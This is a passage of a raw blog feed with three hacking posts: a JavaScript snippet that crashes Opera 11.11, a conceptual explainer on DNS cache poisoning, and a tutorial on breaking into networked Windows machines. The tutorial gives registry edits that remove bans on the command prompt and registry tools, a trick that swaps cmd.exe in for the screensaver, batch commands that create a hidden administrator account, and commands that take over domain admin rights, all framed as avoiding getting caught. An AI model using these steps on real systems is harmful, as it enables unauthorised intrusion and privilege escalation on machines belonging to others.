&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;script&lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;&amp;gt;&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: #141414; line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;&amp;nbsp; &lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;body&lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;&amp;gt;&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: #141414; line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;html&lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;&amp;gt;&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;1. &lt;/span&gt;

&lt;br /&gt;
&lt;div class="MsoNormal" style="background: #141414; line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;&amp;lt;&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;iframe src&lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;=&lt;/span&gt;&lt;span style="color: #8f9d6a; font-family: Consolas; font-size: 9pt;"&gt;'about:blank'&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt; id&lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;=&lt;/span&gt;&lt;span style="color: #8f9d6a; font-family: Consolas; font-size: 9pt;"&gt;'bo0om'&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt; style&lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;=&lt;/span&gt;&lt;span style="color: #8f9d6a; font-family: Consolas; font-size: 9pt;"&gt;"width:0px;height:0px;border:0px none;"&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;&amp;gt;&lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;iframe&lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;&amp;gt;&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;/span&gt;As you can see, we had taken an
iframe with id =bo0om with no source code, no height and no width. 

&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;2.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #8f9d6a; font-family: Consolas; font-size: 9pt;"&gt;&lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="MsoNormal" style="background: #141414; line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;var a &lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;=&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt; window.document.getElementById(&lt;/span&gt;&lt;span style="color: #8f9d6a; font-family: Consolas; font-size: 9pt;"&gt;'bo0om'&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;);&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="MsoListParagraph"&gt;
Then we took a variable ‘a’ and loaded the iframe
into it.&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&amp;nbsp; &lt;/div&gt;
&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;3.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="MsoNormal" style="background: #141414; line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;var b &lt;/span&gt;&lt;span style="color: #cda869; font-family: Consolas; font-size: 9pt;"&gt;=&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt; a.contentDocument.createElement(&lt;/span&gt;&lt;span style="color: #8f9d6a; font-family: Consolas; font-size: 9pt;"&gt;'font'&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;);&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;/span&gt;&lt;span class="apple-style-span"&gt;&lt;span style="background: none repeat scroll 0% 0% rgb(248, 248, 248); color: black; font-family: Consolas; font-size: 10.5pt; line-height: 115%;"&gt;Taking ‘a’ into ‘b’, i.e.
whole iframe into ‘b’ and then adding an element font which I fiscussed in the
very first paragraph of this article.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;4. &lt;/span&gt;

&lt;br /&gt;
&lt;div class="MsoNormal" style="background: #141414; line-height: 15.6pt; margin-bottom: .0001pt; margin-bottom: 0in; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;setTimeout(&lt;/span&gt;&lt;span style="color: #8f9d6a; font-family: Consolas; font-size: 9pt;"&gt;'b.face = "h3h";'&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;,&lt;/span&gt;&lt;span style="color: #cf6a4c; font-family: Consolas; font-size: 9pt;"&gt;100&lt;/span&gt;&lt;span style="color: #f8f8f8; font-family: Consolas; font-size: 9pt;"&gt;);&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background: none repeat scroll 0% 0% rgb(248, 248, 248); color: black; font-family: Consolas; font-size: 10.5pt; line-height: 115%;"&gt;Now setting the timeout to be 500ms, we are asking our page to
load “h3h” into font element of iframe bo0om, (b.face or we can say a.font.face
or ultimately bo0om.font.face= ‘h3h’).&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="MsoNormal" style="margin-left: 0.5in; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="margin-left: 0.5in; text-align: left;"&gt;
&lt;span style="background: none repeat scroll 0% 0% rgb(248, 248, 248); color: black; font-family: Consolas; font-size: 10.5pt; line-height: 115%;"&gt;Now the point
is, this whole code is going to do the same amount of work in an infinite loop
and thus and opera will continuously keep doing this. Due to the memory it
would consume in performing this all, it crashes. &lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="margin-left: .5in;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="margin-left: .5in;"&gt;
&lt;span style="background: none repeat scroll 0% 0% rgb(248, 248, 248); color: black; font-family: Consolas; font-size: 10.5pt; line-height: 115%;"&gt;This is
the Error report I got in on my screen. You can get some difference.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="margin-left: 0.5in;"&gt;
&lt;br /&gt;&lt;/div&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;"&gt;&lt;a href="http://localhostr.com/file/1Tq9Ti9/crash20110928182514.txt"&gt;&lt;span style="background: none repeat scroll 0% 0% rgb(248, 248, 248); font-family: Consolas; font-size: 10.5pt; line-height: 115%;"&gt;http://localhostr.com/file/1Tq9Ti9/crash20110928182514.txt&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-2461156085120645990?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/2461156085120645990/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/11/opera-1111-crash-vulnerabilty.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/2461156085120645990?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/2461156085120645990?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/11/opera-1111-crash-vulnerabilty.html' title='Opera 11.11 Crash Vulnerabilty Discussion'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;DkANQXc6eyp7ImA9WhRSFEw.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-3041555452680633111</id><published>2011-09-23T03:25:00.000-07:00</published><updated>2011-11-15T19:39:50.913-08:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-11-15T19:39:50.913-08:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='ideas'/><category scheme='http://www.blogger.com/atom/ns#' term='domain name server'/><category scheme='http://www.blogger.com/atom/ns#' term='concepts'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title>Small Discussion on DNS Security</title><content type='html'>&lt;span class="fullpost"&gt;

&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.ppkkm.com/images/memberlogos/dns_security.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.theemailadmin.com/wp-content/uploads/2011/09/GFI146-dnssec.jpg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://www.theemailadmin.com/wp-content/uploads/2011/09/GFI146-dnssec.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
You
 might have heard of DNS Attack, DNS spoofing, etc many times. So here i
 am going to discuss a general DNS Security case sttudy. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
DNS cache poisoning (also known as DNS cache pollution) is a maliciously
 created or unintended situation that provides data to a Domain Name 
Server that did not originate from authoritative DNS sources. It occur 
if DNS  "spoofing attack" has been encountered.  An attacker will send 
malicious data / non-secure data  in response to a DNS query.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
For the simplest scenario, a cleint sends DNS server a question , "What is the Ip adress of Hackplane.in" ?&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now DNS server gives it the answer. if the answer matches the question, the client will trust that it had got a right answer. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
BUt here it must be noted that there are various ways in which 
this process can be intercepted or changed or impersonated so that wrong
 answer can be given and thereby making client go for something wrong.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Here i am attaching an image for better understanding of this concept.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-gycYWywnlqo/Tnxg28MD-aI/AAAAAAAAAzo/AW-0DSAQu1k/s1600/ds+cache+posining+explained.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="212" src="http://3.bp.blogspot.com/-gycYWywnlqo/Tnxg28MD-aI/AAAAAAAAAzo/AW-0DSAQu1k/s640/ds+cache+posining+explained.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;&amp;nbsp;Click On the Image for Enlarging. :)&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;b&gt;Now How does one spoof a response.&amp;nbsp;&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1. A question is sent by the cleint and then it waits for the answer.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Well, the question arises that how the client is gonna trust the 
spoofed answers. So there are someof the attributes by which t 
identifies it.&lt;br /&gt;
a) It comes back to same ip it was sent from.&lt;br /&gt;
b) It comes to the same port number it was sent from.&lt;br /&gt;
c) Answer mathces the asked question.&lt;br /&gt;
d) A uinque transaction number.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
In order to spoof a message we need to find out all these 
attributes. We need to have the Ip Address of recursive name server, 
question whichh the cleintsend, so as to inject the answer, the port 
number, and the uninque sequence number. What clicks my mind for all 
this informaiton is WIRESHARK. :P&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;u&gt;&lt;b&gt;Now Whats new??&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dam kaminsky identified that there is a way by which we can 
directly flood the recursivve server with lots f answers so that a right
 combination may go in a hit. (But actually it would not take a long 
time, so dn start putting on ur brains).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now if the Name server deals with authoritative as well as 
recursive responses, any such attack can store bad data and that may be 
forwarded to lame computers that want authoritative responses.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
For somehow controlling this:-&lt;br /&gt;
1. Sequence numbers must be randomized with a greater frequency.&lt;br /&gt;
2. Recursive name servers must be disabled (and if not disabled, must be restricted to only required number of users).&lt;br /&gt;
3. Diffrent Port numbers(apart from 53, default one fixed by IANA)&amp;nbsp; must be used. &lt;br /&gt;
4. More emphasis on encrypted data must be laid on.&lt;br /&gt;
5. DNS SEC (DNS Security policy must be used).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
For a clear logic, jst cop up with the folllowing if else statment.&lt;br /&gt;
&lt;br /&gt;
If DNS is not recursive, it is safe.&lt;br /&gt;
If
 DNS is recursive, then if it provides good randomness or sequence numbers, then it is OKAY (
 A mid position, neither too secure nor too vulnerable).&lt;br /&gt;
If DNS is not recursive as well as it do not provide good randomness, it is highly vulnerable.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.theemailadmin.com/wp-content/uploads/2011/09/GFI146-dnssec.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;/a&gt;&lt;/div&gt;
Enjoy Hacking. :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-3041555452680633111?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/3041555452680633111/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/09/small-discussion-on-dns-security.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/3041555452680633111?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/3041555452680633111?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/09/small-discussion-on-dns-security.html' title='Small Discussion on DNS Security'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-gycYWywnlqo/Tnxg28MD-aI/AAAAAAAAAzo/AW-0DSAQu1k/s72-c/ds+cache+posining+explained.png' height='72' width='72'/><thr:total>2</thr:total></entry><entry gd:etag='W/&quot;A0YNRnk8eyp7ImA9WhdVEk4.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-4723714153749710519</id><published>2011-09-16T22:59:00.000-07:00</published><updated>2011-09-16T22:59:57.773-07:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-09-16T22:59:57.773-07:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='HackingZone'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Stuff'/><category scheme='http://www.blogger.com/atom/ns#' term='Tutorials'/><category scheme='http://www.blogger.com/atom/ns#' term='Commands'/><title>Diffrent ways to Access Command Prompt</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.instructables.com/image/FKLB4OYFECFCIKA/How-to-hack-Telnet.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://www.instructables.com/image/FKLB4OYFECFCIKA/How-to-hack-Telnet.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span id="goog_940502495"&gt;&lt;/span&gt;&lt;span id="goog_940502496"&gt;&lt;/span&gt;This article is about hacking networks. Since any longer than five  minutes, you risk getting caught, this is *hopefully* going to teach you  how to get root in five minutes or less. So, lets get it started. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To those of you that think by getting root, you own everything, sorry to  disapoint you. But, by getting root, you only own the comp your on.  There is however, a way to get domain root, which I'll discuss later.&lt;br /&gt;
&lt;br /&gt;
So first of all , try and check your access to DOS. For doing so :&lt;br /&gt;
&lt;code&gt;&lt;span style="color: blue;"&gt;"start&amp;gt;all programs&amp;gt;accessories&amp;gt;cmd" or "start&amp;gt;run&amp;gt; type in 'cmd'"&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;&lt;span style="color: blue;"&gt;&lt;span style="color: black;"&gt;If it doesnt works, go and make a file named "whatever.txt" Right click, and open it in notepad. Type &lt;span style="color: blue;"&gt;"cmd"&lt;/span&gt; in it and save, if you are able to see some black screen fr a second, yes, you can get it. Now change the content in file, i.e &lt;br /&gt;
&lt;br /&gt;
replace &lt;span style="color: blue;"&gt;"cmd"&lt;/span&gt; with following:&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt; &lt;span style="color: blue;"&gt;@echo off&lt;/span&gt;&lt;br style="color: blue;" /&gt;&lt;span style="color: blue;"&gt; echo hello&lt;/span&gt;&lt;br style="color: blue;" /&gt;&lt;span style="color: blue;"&gt; pause&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;If you see "HACKED" on the screen, then yes you are more closer. Finally now change the content to following :&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;REGEDIT4 &lt;br /&gt;
&lt;span style="color: blue;"&gt;[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp] &lt;/span&gt;&lt;br style="color: blue;" /&gt;&lt;span style="color: blue;"&gt; "Disabled"=dword:0 &lt;/span&gt;&lt;br style="color: blue;" /&gt;&lt;span style="color: blue;"&gt; [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]&lt;/span&gt;&lt;br style="color: blue;" /&gt;&lt;span style="color: blue;"&gt; "DisableRegistryTools"=dword:0&lt;/span&gt;&lt;/code&gt;&lt;code&gt; &lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This changes the registry value that blocks dos. So, type "cmd" in the  .bat and see if it works. If that also didn't work, theres still other  ways.&lt;br /&gt;
&lt;code&gt; &lt;/code&gt;&lt;br /&gt;
Now, type in your commands and click &lt;span style="color: blue;"&gt;"file&amp;gt;save as&amp;gt;" for the type, put "text document,&lt;/span&gt; and save as &lt;span style="color: blue;"&gt;"anything.bat". &lt;/span&gt;&lt;br /&gt;
If that wasn't the reason, I hope you have access to the C drive.&lt;br /&gt;
If you do, go here&lt;span style="color: blue;"&gt; "C:\Windows\system32\" &lt;/span&gt;and create a new folder.&lt;br /&gt;
Now, find &lt;span style="color: blue;"&gt;"cmd.exe"&lt;/span&gt; and &lt;span style="color: blue;"&gt;"scrnsave.scr" &lt;/span&gt;and copy them to the new folder.&lt;br /&gt;
Goto the folder and rename &lt;span style="color: blue;"&gt;"scrnsave.scr" to "scrnsaveold.scr", and  "cmd.exe" to "scrnsave.scr" &lt;/span&gt;And replace it with the real one in  system32. Now the next time your screen saver appears, it will be full  access dos. So, if you can, on the desktop, right click and select  properties. Change the time to one minute. On windows xp, you may have  to make sure the screensaver is&lt;span style="color: blue;"&gt; "scrnsave"&lt;/span&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;Even if it doesnt works, you can go for control panel. yes this one is not gauranteed, but ya at least it may be try at least.&lt;br /&gt;
&lt;br /&gt;
Just create a new folder and rename it to following(obviously only the {} part)&lt;/code&gt;&lt;br /&gt;
&lt;div style="color: blue;"&gt;
&lt;code&gt;&lt;br /&gt;
&lt;/code&gt;&lt;/div&gt;
&lt;code style="color: blue;"&gt;&lt;br /&gt;
Control panel: {305CA226-D286-468e-B848-2B2E8E697B74}&lt;/code&gt;&lt;br /&gt;
&lt;code style="color: blue;"&gt;&lt;/code&gt;&lt;code style="color: blue;"&gt;Printers: {2227A280-3AEA-1069-A2DE-08002B30309D}&amp;nbsp;&lt;/code&gt;&lt;br /&gt;
&lt;code style="color: blue;"&gt;Taskbar and startmenu: {0DF44EAA-FF21-4412-828E-260A8728E7F1}&lt;br /&gt;
Microsoft FTP folder {63da6ec0-2e98-11cf-8d82-444553540000}&lt;br /&gt;
Temporary Internet files {7BD29E00-76C1-11CF-9DD0-00A0C9034933} &lt;br /&gt;
ActiveX Cache folder {88C6C381-2E85-11D0-94DE-444553540000&lt;br /&gt;
Subsc&lt;span style="display: none;"&gt;blocked&lt;/span&gt;riptions folder {F5175861-2688-11d0-9C5E-00AA00A45957}&lt;/code&gt;&lt;br /&gt;
&lt;code style="color: blue;"&gt; Dial-up networking: {992CFFA0-F557-101A-88EC-00DD010CCC48} &lt;br /&gt;
Scheduled tasks: {D6277990-4C6A-11CF-8D87-00AA0060F5BF} &lt;br /&gt;
Folder options: {6DFD7C5C-2451-11d3-A299-00C04F8EF6AF} &lt;br /&gt;
Dial-Up Networking: {992CFFA0-F557-101A-88EC-00DD010CCC48} &lt;br /&gt;
Scheduled tasks: {D6277990-4C6A-11CF-8D87-00AA0060F5BF} &lt;br /&gt;
History {FF393560-C2A7-11CF-BFF4-444553540000}&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code style="color: blue;"&gt;&lt;/code&gt;Another way to get dos, is to create a prog. Uber0n has created such a  program. You can find it at &lt;span style="color: red;"&gt;&lt;span style="background-color: #f3f3f3; color: blue;"&gt;http://www.freewebs.com/uber0n/&lt;/span&gt; &lt;/span&gt;You'll need a  c++ compiler.&lt;br /&gt;
&lt;br /&gt;
If so far, nothing has worked. You need to crack the sam file. Pretty sure Cain &amp;amp; Abel has this option.&lt;br /&gt;
&lt;br /&gt;
If you did get dos, it's time to create yourself an admin acct. Type this.&lt;br /&gt;
&lt;br /&gt;
&lt;div style="color: blue;"&gt;
&lt;code&gt;@echo off&lt;br /&gt;
net user hackplanet hackplanet /add&lt;br /&gt;
net localgroup administrators hackplanet /add&lt;br /&gt;
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hackplanet/t REG_DWORD /d 0&lt;/code&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
First Line just hides the file address and stuff.&lt;br /&gt;
Second Line Creates the user "hackplanet" with the password of "hackplanet".&lt;br /&gt;
Third Line adds "upgoingstar" to the administrators group.&lt;br /&gt;
Fourth Line makes the acct "upgoingstar" a hidden acct.&lt;br /&gt;
If you see "The command completed successfully." or something similiar,  congragulations. You now have root. If it didn't work, it means you have  limited access dos, use the screensaver thing.&lt;br /&gt;
&lt;br /&gt;
If you want domain root, you can either find the domain admin's username and type&lt;br /&gt;
&lt;br /&gt;
&lt;div class="quote" style="overflow: auto; white-space: nowrap; width: 400px;"&gt;
&lt;code&gt;&lt;br /&gt;
&lt;span style="color: blue;"&gt;@echo off&lt;/span&gt;&lt;br style="color: blue;" /&gt;&lt;span style="color: blue;"&gt; net user [username] [newpassword]&lt;/span&gt;&lt;br /&gt;
&lt;/code&gt;&lt;/div&gt;
&lt;br /&gt;
That will change the pass.&lt;br /&gt;
Or, if you can get on his/her comp, type this in dos.&lt;br /&gt;
&lt;div class="quote" style="overflow: auto; white-space: nowrap; width: 400px;"&gt;
&lt;code&gt;&lt;br /&gt;
&lt;span style="color: blue;"&gt;net group "Domain Admins" [username] /add&lt;/span&gt;&lt;br /&gt;
&lt;/code&gt;&lt;/div&gt;
&lt;br /&gt;
This will add an acct to the domain admins.&lt;br /&gt;
&lt;code&gt; &lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
